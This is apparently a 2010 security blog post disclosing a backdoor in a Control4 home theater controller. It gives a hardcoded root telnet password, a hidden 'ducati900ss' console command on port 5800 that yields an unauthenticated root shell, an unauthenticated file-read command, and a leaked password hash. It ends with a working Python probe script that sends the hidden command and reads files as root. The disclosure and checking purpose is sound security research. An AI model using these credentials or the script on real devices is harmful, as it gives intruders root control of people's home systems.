Control4 gear is umm... backdoored, I guess?
Wednesday, October 13, 2010
So I bought a few Control4 items off eBay so I could get a feel for KillerBee. This was sort of a FAIL, since the gear I ended up with was older EmberZNet-based kit. I’ll get to that story in another post.
To make a long story short, I had to hold the only button on the front of my Control4 Home Theater Controller AVMHTC1B in order to reset its network settings. Once I did this the device instantly took a DHCP address on my LAN. You know what happened next:
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-10-13 15:14 EDT
Nmap scan report for 10.0.1.14
Host is up (0.026s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
5100/tcp open admd
5101/tcp open admdog
5560/tcp open isqlplus
5800/tcp open vnc-http
6000/tcp open X11
6100/tcp open unknown
Again, to keep a long story short: I found the password referenced on the Control4 dealer forums, along with some interesting quotes that I will share later. Eventually I simply took the device apart and mounted the USB drive I found inside; adding a line to its passwd file was easy enough.
On the exact same day I stumbled upon this web page:
http://control4brasil.forumais.com/documentacoes-f1/touch-screen-calibration-t2.htm
“10.5 Touch screen
This will also work on the other touch screens but this is the only way to re-calibrate the 10.5.
telnet into the Touch screen.
start>
run>
telnet (IP address of the touchscreen)
login: root
password: t0talc0ntr0l4!
>cd etc
>rm pointercal
>reboot.”
I also ran across this one:
http://code.google.com/p/c4touch/wiki/TelnetLoginInfo
“TelnetLoginInfo
The userid and password required to login to your Control4 controller via telnet.
username:root password:t0talc0ntr0l4!
Note that the 0s above are zeros and not the letter oh.”
At this point you are going “OK, so where is the backdoor...”. If you thought it was the hardcoded root password, you are wrong.
$ telnet 10.0.1.14
Trying 10.0.1.14...
Connected to 10.0.1.14.
Escape character is '^]'.
ht-controller-000FFF0370A7 login: root
Password:
Welcome to
____ _ _ __
/ __| _| |_ | | / |
| | ___ ___|_ _|__ ___ | |/ O |_
| | / \| _ \| | __\/ \| |__ _|
| |__| O | | | | | | | O | | | |
\____\___/|_| |_|_|_| \___/|_| |_|
T E C H N O L O G I E S
Home Theater Controller
Console
For further information check:
BusyBox v1.1.3 (2008.10.09-22:51+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
~# id
uid=0(root) gid=0(root)
Now tell me, does THIS resemble a backdoor? Port 5800 is not VNC here; it is the sysmand console, and it asks for no credentials at all:
$ telnet 10.0.1.14 5800
Trying 10.0.1.14...
Connected to 10.0.1.14.
Escape character is '^]'.
help
help Help (this command).
status Get enabled/disabled status.
quit Quit the session.
date Get/set date (MM/DD/YYYY).
time Get/set time (HH:MM:SS).
timezone Get/set timezone (zone name).
timezones Get list of timezones.
enable Enable daemon.
disable Disable daemon.
ntp NTP daemon (start|stop|restart).
oldupdate Update pre 1.3 release system
version Get package versions.
reboot Reboot machine.
suspend Stop daemon.
resume Start daemon.
net Network configuration (see net help).
kill Kill daemon
restart Restart all enabled processes.
sysinfo Get system info (XML result).
procpoll Get process info (XML result).
syslog Configure logging.
tail Tail a file.
whoami Return IP of this connection.
OK
ducati900ss
/bin/sh: can't access tty; job control turned off
BusyBox v1.1.3 (2008.10.09-22:51+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
/mnt/jffs2/etc/sysman.d# id
id
uid=0(root) gid=0(root)
/mnt/jffs2/etc/sysman.d#
/mnt/jffs2/etc/sysman.d# exit
exit
OK
Invalid command
OK
If you missed it, “ducati900ss” is NOT a standard command: it does not appear in the help output, yet sending it makes sysmand hand you an interactive /bin/sh as root on the same socket, with no login of any kind.
/mnt/ram/tmp# strings /control4/bin/sysmand | grep ducati
ducati900ss
If you run strings on the binary you can see it hidden away between the documented commands, right next to the format string used to glue the shell’s stdin/stdout/stderr to the socket descriptor:
version
Get package versions.
reboot
Reboot machine.
suspend
Stop daemon.
resume
Start daemon.
Network configuration (see net help).
ducati900ss
Command shell
kill
Kill daemon
restart
Restart all enabled processes.
sysinfo
Get system info (XML result).
Rebooting system
/bin/sh -i <&%d >&%d 2>&1
Killed %s
Can't kill %s
%s is not running
The tail command seems to be a bit interesting as well: it reads any file on the box as root, again without any authentication.
$ telnet 10.0.1.14 5800
Trying 10.0.1.14...
Connected to 10.0.1.14.
Escape character is '^]'.
tail /etc/smbpasswd
root:0:D480EA9533C500D4AAD3B435B51404EE:329153F560EB329C0E1DEEA55E88A1E9:[UX ]:LCT-410018DC:
(The LM half cracks to “ROOT”; the second half, AAD3B435B51404EE, is the LM hash of an empty block, so you know up front that the password is seven characters or fewer.)
Unfortunately the root line of the shadow file can’t be read this way: tail returns only the last ten lines of a file by default, and root sits at the top. The same thing happens with /etc/passwd:
$ telnet 10.0.1.14 5800
Trying 10.0.1.14...
Connected to 10.0.1.14.
Escape character is '^]'.
tail /etc/passwd
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:
games:*:12:100:games:/usr/games:
gopher:*:13:30:gopher:/usr/lib/gopher-data:
ftp:*:14:50:FTP User:/:
nobody:*:99:99:Nobody:/:
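The two port-5800 tricks above (the hidden shell command and the unauthenticated file read) are easy to turn into a repeatable check. The script below is an added example of mine, not code from Control4 or from the original post. It speaks the console protocol as observed in the transcripts (one command per line, responses terminated by a line reading OK, the hidden command switching the socket over to /bin/sh), and it ships with a small in-process mock daemon constructed from those transcripts so it can be run offline; the mock’s file contents are made up for illustration, except for the smbpasswd line copied from above.

```python
"""Probe the Control4 sysmand console (TCP 5800) for the hidden shell command
and the unauthenticated 'tail' file read.  Added example, not Control4's code;
the protocol details below are assumptions taken from the transcripts above."""
import socket
import threading

HIDDEN_CMD = "ducati900ss"  # undocumented command found with `strings sysmand`


def _read(sock, done, timeout=3.0):
    """Read from sock until done(buf) is true, the peer closes, or we time out."""
    sock.settimeout(timeout)
    buf = b""
    try:
        while not done(buf):
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
    except socket.timeout:
        pass
    return buf.decode("utf-8", "replace")


def _ok_terminated(buf):
    """Every normal sysmand response ends with a line that is just 'OK'."""
    return buf == b"OK\n" or buf.endswith(b"\nOK\n")


def sysman_cmd(host, port, cmd):
    """Send one console command; return its response lines minus the 'OK'."""
    with socket.create_connection((host, port), timeout=3) as s:
        s.sendall(cmd.encode() + b"\n")
        text = _read(s, _ok_terminated)
    return [ln for ln in text.splitlines() if ln != "OK"]


def tail_file(host, port, path):
    """Read the last lines of any file as root, no login required."""
    return sysman_cmd(host, port, "tail " + path)


def has_hidden_shell(host, port):
    """Send the hidden command, then `id`: a live root shell answers uid=0."""
    with socket.create_connection((host, port), timeout=3) as s:
        s.sendall(HIDDEN_CMD.encode() + b"\nid\n")
        text = _read(s, lambda b: b"uid=" in b or b"Invalid command" in b)
        s.sendall(b"exit\n")  # leave the shell so sysmand keeps running
    return "uid=0(root)" in text


# ---- mock daemon, constructed from the transcripts so the probe runs offline ----
MOCK_FILES = {  # constructed sample contents (root is on the first line, as usual)
    "/etc/passwd": ["root:x:0:0:root:/root:/bin/sh"]
    + ["svc%d:*:%d:%d:svc:/:" % (i, i, i) for i in range(1, 13)],
    "/etc/smbpasswd": ["root:0:D480EA9533C500D4AAD3B435B51404EE:"
                       "329153F560EB329C0E1DEEA55E88A1E9:[UX ]:LCT-410018DC:"],
}


def _mock_handle(conn):
    """Speak just enough of the observed protocol to exercise the client."""
    shell = False
    try:
        with conn, conn.makefile("rb") as rf:
            for raw in rf:
                line = raw.decode("utf-8", "replace").strip()
                if shell:  # emulate `/bin/sh -i` glued to the socket
                    if line == "exit":
                        shell = False
                        conn.sendall(b"OK\n")
                    elif line == "id":
                        conn.sendall(b"uid=0(root) gid=0(root)\n")
                    else:
                        conn.sendall(b"/bin/sh: %s: not found\n" % line.encode())
                elif line == HIDDEN_CMD:
                    shell = True
                    conn.sendall(b"/bin/sh: can't access tty; job control turned off\n")
                elif line.startswith("tail "):
                    body = MOCK_FILES.get(line[5:], [])[-10:]  # tail's default: last 10
                    conn.sendall("".join(l + "\n" for l in body).encode() + b"OK\n")
                elif line == "help":
                    conn.sendall(b"help    Help (this command).\ntail    Tail a file.\nOK\n")
                else:
                    conn.sendall(b"Invalid command\nOK\n")
    except OSError:
        pass  # client went away mid-response; nothing to do


def start_mock(host="127.0.0.1"):
    """Start the mock daemon on an ephemeral port; returns (host, port)."""
    srv = socket.socket()
    srv.bind((host, 0))
    srv.listen(5)

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_mock_handle, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return host, srv.getsockname()[1]


if __name__ == "__main__":
    import sys
    # usage: python sysman_probe.py <host> <port>   (no args: run against the mock)
    host, port = (sys.argv[1], int(sys.argv[2])) if len(sys.argv) > 2 else start_mock()
    print("hidden root shell on %s:%d:" % (host, port), has_hidden_shell(host, port))
    print("\n".join(tail_file(host, port, "/etc/passwd")))
```

Against a real controller, point it at the device and port 5800; against a fixed daemon the hidden command should come back as “Invalid command” and has_hidden_shell returns False. The mock also reproduces the tail limitation from the text: with root on line one of a thirteen-line passwd file, the ten-line tail never shows it.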
You should note that I have seen other “ducati” references in log files posted on various forums. One example follows (it contains two such passwords, sent in the clear to a touch screen):
http://www.c4dealers.com/viewtopic.php?pid=11785#p11785
07/17/2008 20:46:49 Sending packet to device Mini Touch Screen(192.168.1.105). Message is: ducati996
07/17/2008 20:46:49 Sending packet to device Mini Touch Screen(192.168.1.105). Message is: ducati900ss
Hrmm... seems like fun to be had. More soon, especially since the system seems to take Debian woody ARM .deb files!